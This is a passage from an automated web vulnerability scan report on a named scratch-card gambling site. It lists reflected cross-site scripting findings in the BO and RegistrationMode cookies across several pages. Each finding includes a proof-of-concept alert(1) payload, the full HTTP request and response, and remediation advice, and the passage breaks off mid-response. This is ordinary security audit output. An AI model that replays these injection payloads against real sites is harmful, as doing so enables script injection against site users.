Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM675ff"-alert(1)-"e8312342e57; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:11 GMT; path=/
Set-Cookie: BO=FM675ff"-alert(1)-"e8312342e57; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:11 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:11 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:11 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:11 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46188


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM675ff"-alert(1)-"e8312342e57";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.407. http://www.scratchcardheaven.com/FairPlay.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /FairPlay.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31ad6"-alert(1)-"f8ccb988749 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM31ad6"-alert(1)-"f8ccb988749; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM31ad6"-alert(1)-"f8ccb988749; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:00 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:00 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:00 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:00 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:00 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46188


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM31ad6"-alert(1)-"f8ccb988749";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.408. http://www.scratchcardheaven.com/Help.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /Help.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdb61"-alert(1)-"98e87135bb9 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Help.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FMcdb61"-alert(1)-"98e87135bb9; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:59 GMT; path=/
Set-Cookie: BO=FMcdb61"-alert(1)-"98e87135bb9; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:59 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:59 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:59 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:59 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45317


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMcdb61"-alert(1)-"98e87135bb9";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.409. http://www.scratchcardheaven.com/Help.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /Help.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdccc"-alert(1)-"49cc42fdbd9 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Help.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMcdccc"-alert(1)-"49cc42fdbd9; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMcdccc"-alert(1)-"49cc42fdbd9; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:48 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:48 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:48 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:48 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45317


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMcdccc"-alert(1)-"49cc42fdbd9";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.410. http://www.scratchcardheaven.com/Home.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /Home.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fb04"-alert(1)-"0944ce4f5e4 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Home.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM4fb04"-alert(1)-"0944ce4f5e4; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:16 GMT; path=/
Set-Cookie: BO=FM4fb04"-alert(1)-"0944ce4f5e4; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:16 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:16 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:16 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:16 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44459


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM4fb04"-alert(1)-"0944ce4f5e4";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.411. http://www.scratchcardheaven.com/Home.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /Home.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 239a6"-alert(1)-"cb8c500f1b0 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Home.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM239a6"-alert(1)-"cb8c500f1b0; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM239a6"-alert(1)-"cb8c500f1b0; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:05 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:05 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:05 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:05 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:05 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44459


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM239a6"-alert(1)-"cb8c500f1b0";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.412. http://www.scratchcardheaven.com/InviteFriend.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /InviteFriend.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1a06"-alert(1)-"11ff6bc27c7 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FMf1a06"-alert(1)-"11ff6bc27c7; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:34 GMT; path=/
Set-Cookie: BO=FMf1a06"-alert(1)-"11ff6bc27c7; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:34 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:34 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:34 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:34 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56940


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMf1a06"-alert(1)-"11ff6bc27c7";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.413. http://www.scratchcardheaven.com/InviteFriend.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /InviteFriend.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67cd9"-alert(1)-"73e69b2fb22 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM67cd9"-alert(1)-"73e69b2fb22; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM67cd9"-alert(1)-"73e69b2fb22; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:21 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:21 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:21 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:21 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:21 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56940


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM67cd9"-alert(1)-"73e69b2fb22";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.414. http://www.scratchcardheaven.com/PlayersClub.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /PlayersClub.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d323d"-alert(1)-"bf06e67383 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FMd323d"-alert(1)-"bf06e67383; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:03 GMT; path=/
Set-Cookie: BO=FMd323d"-alert(1)-"bf06e67383; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:03 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:03 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:03 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:03 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53378


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMd323d"-alert(1)-"bf06e67383";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.415. http://www.scratchcardheaven.com/PlayersClub.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /PlayersClub.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aba62"-alert(1)-"4327c71e7a3 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMaba62"-alert(1)-"4327c71e7a3; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
